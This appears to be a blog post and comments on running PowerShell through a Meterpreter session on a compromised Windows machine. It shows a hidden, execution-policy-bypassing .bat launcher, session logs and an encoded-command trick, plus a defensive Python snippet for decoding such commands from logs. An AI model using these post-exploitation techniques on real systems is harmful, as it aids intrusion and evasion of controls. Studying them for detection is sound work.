Part of it is the whole interactive shell-ness of PowerShell: if you just type "powershell" once you drop to a cmd.exe shell, you won't ever get the PowerShell prompt.
In a similar vein, I've been unable to get any sort of combination of execute -f powershell.exe -a "blah blah" to work either. If anyone has the magic syntax, I know lots of people who would be interested. (Actually Carlos Perez hooked me up; answer below.)
So, you can run PowerShell scripts via .bat files, and those execute just fine from within cmd.exe, from the "execute" command, OR via the encoded command [command].
C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1
Example:
meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter >
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400
Carlos Perez mentioned at DerbyCon that you can also do the following:
On Linux, download this script: https://github.com/
You can use it to encode a script and then run it like so:
msf exploit(handler) >
[*] Sending stage (752128 bytes) to 192.168.1.225
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\carlos\Desktop> powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
hello world
C:\Users\carlos\Desktop>
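As an added example (not code from the post or from Carlos Perez's encoder script): the -EncodedCommand argument is simply the script as UTF-16LE bytes, base64-encoded, which is why the string above decodes to write-host hello world. The Python below does that encoding, and the reverse decoding an analyst needs when such a command line turns up in process-creation logs; the log lines are constructed, and the set of flag spellings the regex looks for is an assumption.

```python
import base64
import re
from typing import Optional

# The encoded "hello world" command from the session above, used as a sample.
SAMPLE_ENCODED = "dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA="

# Constructed process-creation log lines (not real telemetry); the second
# uses the short "-enc" spelling that powershell.exe also accepts.
SAMPLE_LOG = [
    "4688 CommandLine=cmd.exe /c C:\\runps.bat",
    "4688 CommandLine=powershell.exe -NoProfile -enc " + SAMPLE_ENCODED,
]


def encode_command(script: str) -> str:
    """Encode a script for -EncodedCommand: UTF-16LE bytes, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Reverse it. Whitespace is stripped and padding restored first, since
    values copied out of logs or web pages are often wrapped or truncated."""
    cleaned = re.sub(r"\s+", "", encoded)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True).decode("utf-16-le")


# powershell.exe takes any unambiguous prefix of -EncodedCommand; this list
# of spellings is an assumption. -ep (ExecutionPolicy) must not match.
_ENC_FLAG = re.compile(
    r"(?i)[-/](?:e|ec|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)


def decode_from_log(line: str) -> Optional[str]:
    """Return the decoded script if the line carries an encoded command,
    or None for plain invocations so the caller can skip them."""
    match = _ENC_FLAG.search(line)
    if not match:
        return None
    try:
        return decode_command(match.group(1))
    except ValueError:  # bad base64 or bytes that are not valid UTF-16LE
        return None


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(decode_from_log(line))
```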
Would something like this work:
C:\WINDOWS\system32\cmd.exe /c powershell -command `"& {Set-ExecutionPolicy Unrestricted -Force}`" && powershell -File `"C:\sript1.ps1`"
Set-ExecutionPolicy requires admin privileges; on the other hand
powershell -NoProfile -ExecutionPolicy Unrestricted .\script.ps1
works fine even without admin privileges.
Note that the default PowerShell host (ConsoleHost) depends a lot on having a native console available - even executing a console application or trying to read input is done via the native console instead of using standard input/output streams.
An alternative might be to implement an alternative Host class, like my StreamHost.
I tried to implement that as a PowerShell script, but failed due to the fact that I could not read from the standard input stream without hanging the ConsoleHost that is used to execute the script.
Maybe someone else is more successful there.